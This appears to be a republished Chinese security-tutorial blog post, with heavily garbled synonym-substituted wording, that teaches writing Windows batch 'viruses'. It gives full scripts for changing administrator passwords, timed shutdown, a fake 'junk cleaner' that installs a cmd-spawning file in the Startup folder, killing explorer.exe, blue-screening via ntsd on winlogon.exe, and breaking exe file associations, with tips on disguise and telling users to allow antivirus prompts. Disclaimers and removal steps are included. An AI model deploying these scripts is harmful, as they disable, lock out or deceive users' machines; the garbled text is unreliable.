病毒详解及批处置病毒造做：自启动、修改密码、按时关机、蓝屏、历程封闭

【编者案】病毒那个不速之客让人谈之色变，它像一个藏在斗篷侠下的黑衣人，被“帮衬”的人就会不利。本文为做者的收集平安自学教程系列文章之一，将讲解简单的病毒原理常识，并通过批处置代码造做病毒，包罗主动启、修改密码、按时关机、蓝屏、历程封闭等功用。希望那篇根底文章对各人有所帮忙，更希望各人进步平安意识，学会相关防备，也欢送各人讨论。

做者 | 杨秀璋

责编 | 夕颜

本文受权转载自CSDN博客专家Eastmount

声明：本人坚定反对操纵教学办法停止立功的行为，一切立功行为势必遭到严惩，绿色收集需要我们配合维护，更保举各人领会它们背后的原理，更好地停止防护。

一.关机bat脚本

计算机病毒（Computer Virus）是体例者在计算机法式中插入的毁坏计算机功用或者数据的代码，能影响计算机利用，能自我复造的一组计算机指令或者法式代码。计算机病毒具有传布性、隐蔽性、传染性、暗藏性、可激发性、表示性或毁坏性。

计算机病毒的生命周期：开发期→传染期→暗藏期→爆发期→发现期→消化期→消亡期。计算机病毒是一个法式，一段可施行码。就像生物病毒一样，具有自我繁衍、互相传染以及激活再生等生物病毒特征。计算机病毒有奇特的复造才能，它们可以快速蔓延，又常常难以肃除。它们能把本身附着在各类类型的文件上，当文件被复造或从一个用户传送到另一个用户时，它们就伴同文件一路蔓延开来。

下面讲解第一个批处置脚本，次要是挪用“shutdown”实现关机。其根本步调如下：

新建文本文档

输入 shutdown -s -t 600

把txt改成bat

如下图所示，运行CMD能够查看shutdown号令的根本用法。

根本号令为：

1 shutdown -s -t 6002//如今让系统600秒之后关机34shutdown -a5//末行封闭计算机运行成果如下图所示：

新建“test.bat”并填写“ shutdown -s -t 600”，某些系统需要在“文件夹选项”中，显示“隐藏已知文件类型的扩展名”。

双击BAT文件即运行关机，若是需要打消，仍是在CMD黑框中输入“shutdown -a”号令。

二.修改密码和按时关机病毒

接下来分享一个比力完好的病毒造做过程。

第一步，新建game.bat文件。

法式编写如下所示，此中“@echo off”暗示封闭回显，“color 0a”暗示设置颜色。

1 @echo off2color 0a3title Eastmount法式45echo ===================================6echo 菜单7echo 1.修改办理员密码8echo 2.按时关机9echo 3.退出本法式10echo ===================================1112pause运行成果如下图所示，能够看到题目为“Eastmount法式”，而且包罗相关内容，那就是批处置文件施行过程。

第二步，做一个选择判断，该法式需要和用户停止互动。

核心代码为“set /p num=您的选择是：”，其暗示设置变量num，“/p”暗示暂停并期待用户输入，用户最末输入的值赋为num。

1 @echo off2color 0a3title Eastmount法式45echo ===================================6echo 菜单7echo 1.修改办理员密码8echo 2.按时关机9echo 3.退出本法式10echo ===================================1112set /p num=您的选择是：1314pause输出成果如下图所示：

第三步，弥补修改办理员密码、按时关机、退出等号令。

修改办理员密码的号令是微软所有系统的通用号令，下述代码是修改当前办理员密码为“123456”。

1 net user administrator 123456

第二个选项是关机，号令如下：

1 shutdown -s -t 100第三个选项是退出本法式。

1 exit接着编写判断和跳转批处置代码，代码如下所示，“>nul”暗示不输出运行提醒信息。

1 @echo off2color 0a3title Eastmount法式45:menu6echo ===================================7echo 菜单8echo 1.修改办理员密码9echo 2.按时关机10echo 3.退出本法式11echo ===================================1213set /p num=您的选择是：14if "%num%"=="1" goto 115if "%num%"=="2" goto 216if "%num%"=="3" goto 31718:119net user administrator 123456 > nul20echo 您的密码已经设置胜利！21pause22goto menu2324:225shutdown -s -t 10026goto menu2728:329exit此时输入“1”会提醒系统错误，如下图所示：

同时，杀毒软件也会提醒黑客修改电脑，点击“允许操做”即可，

接着增加“cls”号令清屏。同时，为了制止输入数字“4”会从头施行到尾，弥补一个提醒信息。代码修改如下：

1 @echo off2color 0a3title Eastmount法式45:menu6cls7echo ===================================8echo 菜单9echo 1.修改办理员密码10echo 2.按时关机11echo 3.退出本法式12echo ===================================1314set /p num=您的选择是：15if "%num%"=="1" goto 116if "%num%"=="2" goto 217if "%num%"=="3" goto 31819echo 您好！请输入1-3准确的数字20pause21goto menu2223:124net user administrator 123456 >nul25echo 您的密码已经设置胜利！26pause27goto menu2829:230shutdown -s -t 10031goto menu3233:334exit此时运行如下图所示：

继续修改代码，弥补设置的用户名和新密码，关机时间等。

1 @echo off2color 0a3title Eastmount法式45:menu6cls7echo ===================================8echo 菜单9echo 1.修改办理员密码10echo 2.按时关机11echo 3.退出本法式12echo ===================================1314set /p num=您的选择是：15if "%num%"=="1" goto 116if "%num%"=="2" goto 217if "%num%"=="3" goto 31819echo 您好！请输入1-3准确的数字20pause21goto menu2223:124set /p u=请输入用户名:25set /p p=请输入新密码:26net user %u% %p% >nul27echo 您的密码已经设置胜利！28pause29goto menu3031:232set /p time=请输入时间:33shutdown -s -t %time%34goto menu3536:337exit以“办理员身份运行”后，胜利修改“xiuzhang”用户的开秘密码。

输入2能够设置关机时间，那里就不再赘述，第一部门已经详细讲解。

三.自启动死机病毒

接着编写一个假装成“系统垃圾清理”的代码，它其实是一个招致系统死机的代码，也不克不及算是“病毒”，更多是一个恶做剧法式。其原理是不竭翻开CMD法式，占用系统资本从而招致死机，而且每次开机城市主动启。

PS：那里强调一句，建议各人在虚拟机中运行该代码。我们做为平安工程师，希望您们去领会破绽背后的原理，更好地停止防御，绿色收集需要我们配合维护，根绝一切违法行为。

第一步，在C:\windows目次下创建文件“windows.bat”。一个“>”暗示笼盖文件内容，两个“>>”暗示逃加一句话至文件末尾。

1echo start cmd >c:\windows\windows.bat2echo %0>>c:\windows\windows.bat用户翻开那个法式之后，法式就会不竭翻开cmd，占用系统资本，招致系统瘫痪，%0是再次施行该法式的意思。但是，如许只能让用户死机一次，重启系统以后，不再翻开那个文件以后，就不再会中招了。

第二步，将那个歹意脚本放到开机菜单中，每次开机都主动启动运行并招致电脑死机。

errorlevel为预定义变量，跟着系统变革而变革。若是为0暗示上一条号令施行胜利，若是非0暗示上一条号令施行失败，它不是Win7系统，而施行下面那条号令（XP系统、2003系统）。

代码“echo.”暗示空行，好比代码：

输出成果如下图所示：

第三步，接着编写next区域代码，完好代码如下所示。

1@echo off2title 系统垃圾清理3color 2f4echo =====如有杀毒软件歹意拦截，请选择【允许法式的所有操做】====5echo.6echo.78echo start cmd >c:\windows\windows.bat9::echo %%0>>c:\windows\windows.bat1011copy c:\windows\windows.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\">nul12if %errorlevel%==0 goto next1314copy c:\windows\windows.bat "%USERPROFILE%\「起头」菜单\法式\启动\">nul15if %errorlevel%==1 goto error1617:next18echo.19echo.20echo =====垃圾清理中，请不要封闭窗口=========21echo.22ping -n 5 127.0.0.1>nul23echo.24echo =====垃圾清理完毕,共清理垃圾500M=======25echo.26echo.27echo =====建议立即重启电脑==========28pause2930:error31echo.32echo.33echo ======法式运行失败，请【利用办理员权限】从头运行！========34echo.35pause留意，我正文了反复操做代码“::echo %%0>>c:\windows\windows.bat”，不然开机自启动很费事。接着运行代码，如下图所示，需要右键“以办理员身份运行”。

代码会在C:\windwos目次下创建批处置文件“windows.bat”。

同时，在我的Win10系统开机主动动目次下也有该文件。

目次：…\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

翻开该文件能够看到写入的“start cmd”代码，暗示翻开CMD。

双击该“windows.bat”文件，运行成果如下图所示。

总结：本文编写了一个系统清理东西，其实是把那个windows.bat写到用户的开机自启动目次下，到达用户每次开机，城市运行该法式的目标，反复挪用CMD占用资本。若是中了该病毒，用户能够利用PE到开启启动目次把windows.bat文件删除，或者重拆系统，再次建议各人别让它反复运行。

四.历程封闭病毒

再看一个假装垃圾清理的批处置代码。该号令是杀死历程，“/im explorer.exe”暗示要杀死的历程名称，封闭桌面；“/f”暗示强迫杀死；“>nul”暗示在屏幕上不要输出任何信息。

1taskkill /im explorer.exe /f >nul 2>nul完好代码如下所示，此中“Start c:\windows\expolrer.exe”暗示继续开启桌面，“ping -n 5 127.0.0.1>nul”用于消耗时间。

1@echo off2title 系统垃圾清理3color 2f4echo =====如有杀毒软件歹意拦截，请选择【允许法式的所有操做】====5echo.6echo.7echo.8echo =====垃圾清理中，请不要封闭窗口=========9echo.10ping -n 5 127.0.0.1>nul11taskkill /im explorer.exe /f >nul 2>nul12echo.13echo =====拐了，你的系统已经废了=======14echo.15ping -n 5 127.0.0.1>nul16echo.17Start c:\windows\explorer.exe18echo.19echo =====已经修复好！是不是吓坏了！！O(∩_∩)O==========20pause运行该批处置法式，桌面会消逝，如下图所示。

过一会桌面又会恢复。因为做者桌面工具太乱，那里仅显示壁纸展现。

五.最简单的蓝屏炸弹文件

新建文本文档

输入：ntsd -c q -pn winlogon.exe，暗示强迫杀死历程

东西->文件夹选项->查看->“隐藏已知文件类型的扩展名”勾选

txt修改为bat

起头->法式->启动，翻开game.bat文件

黑客很少攻击小我，一般攻击办事器，该号令对2003的办事器出格有杀伤力

双击之后，办事器间接蓝屏显示并重启。

ntsd从Windows 2000起头就是系统自带的历程调试东西，在system32目次下。ntsd的功用十分的强大，用法也比力复杂，但若是只用来完毕一些历程，那就比力简单了。在Windows中只要System、SMSS.EXE和CSRSS.EXE不克不及杀。前两个是纯内核态的，最初阿谁是Win32子系统，ntsd自己需要它。lsass.exe也不要杀掉，它是负责当地账户平安的。被调试器附着的历程会随调试器一路退出，所以能够用来在号令行下末行历程。

翻开cmd 后输入以下号令就能够完毕历程：

办法一：操纵历程的PID完毕历程

号令格局：ntsd -c q -p pid

号令规范：ntsd -c q -p 1332 （完毕explorer.exe历程）

规范详解：explorer.exe的pid为1332，但是若何获取历程的pid呢？在CMD下输入TASKLIST就能够获取当前使命办理器所有历程的PID。或者翻开使命办理器，在菜单栏，选择“查看”->“选择列”，在翻开的选择项窗口中将“PID（历程标识符）”项选择钩上，如许使命办理器的历程中就会多出PID一项了。PID的分配其实不固定，是在历程启动是由系统随机分配的，所以历程每次启动的历程一般都不会一样。

办法二：操纵历程名完毕历程

号令格局：ntsd -c q -pn xxxx.exe （xxxx.exe 为历程名，exe不克不及省）

号令规范：ntsd -c q -pn explorer.exe

别的的能完毕历程的DOS号令还有taskkill和tskill号令。

六.最简单的扩展名病毒

将文件格局修改或文档加密都是常见的病毒，好比永久之蓝、讹诈病毒等，它们就是将电脑内的所有材料、文档加密，当你要翻开文件时，需要密码，此时通过比特币付费停止讹诈。

下面那个小操做是将exe文件修改为txt文档。当碰到可施行的exe文件，会认为它是一个txt文档，用记事本翻开，招致可施行法式运行不起来，那是就是那个病毒的原理。

新建文本文档

增加代码：assoc.exe=txtfile

东西->文件夹选项->查看->“隐藏已知文件类型的扩展名”勾选

txt修改为bat

起头->法式->启动，翻开bat文件

双击运行bat文件之后，我们的可施行文件就酿成了txt文件。此时系统认为exe就是txt法式，把系统的联系关系搞紊乱了，它恢复起来很费事。

EXE法式翻开如下图所示。

以至翻开CMD都是TXT文本文件。

接着需要施行下面的号令复原exe文件。

assoc.exe=exefile

复原的代码及效果如下图所示。

其他所有文件格局都转换为txt文件，如下所示。此时，若是隐藏文件扩展名，以至能够修改图标假装成目的应用，当用户点击时会施行那些毁坏；但因为不晓得目的能否有隐藏文件扩展名，仍是不建议那种“笨”办法。

1assoc .htm=txtfile2assoc .dat=txtfile3assoc .com=txtfile4assoc .rar=txtfile5assoc .gho=txtfile6assoc .mvb=txtfile7...处理办法：

若是您不幸中了该病毒，怎么处理呢？如下图所示，复原所有准确联系关系即可。

PS：还有一些病毒，好比VBS脚本、网页弹窗（网站垂钓）等，那里不再讲解，保举读者阅读前文“[收集平安自学篇] 二十五.Web平安进修道路及木马、病毒和防御初探”。若是把病毒法式放到启动项，每次开机城市主动施行。

七.总结

希望那系列文章对您有所帮忙，实的觉得本身手艺好菜，要学的常识好多。那是第44篇原创的平安系列文章，从收集平安到系统平安，从木马病毒到后门劫持，从歹意代码到溯源阐发，从渗入东西到二进造东西，还有Python平安、顶会论文、黑客角逐和破绽分享。未知攻焉知防，人生漫漫其路远兮，做为初学者，本身实是爬着前行，感激良多人的帮忙，继续爬着，继续加油！

欢送各人讨论，能否觉得那系列文章帮忙到您！任何建议都能够评论告知读者，共勉。

侠之为大，为国为民。向一线医护人员、军人、工人、科学家和所有工做者致敬。咱们中国人一生的更高逃求，为六合立心，为生民立命，为往圣继绝学，为万世开承平，他们实的做到了。生活哪有什么岁月静好，只不外那些人替我们负重前行。希望每一小我都安康安然，戴口罩不出门，勤洗手多吃饭。武汉加油，湖北加油，中国加油。寡志成城，加油必胜！！！

原文链接：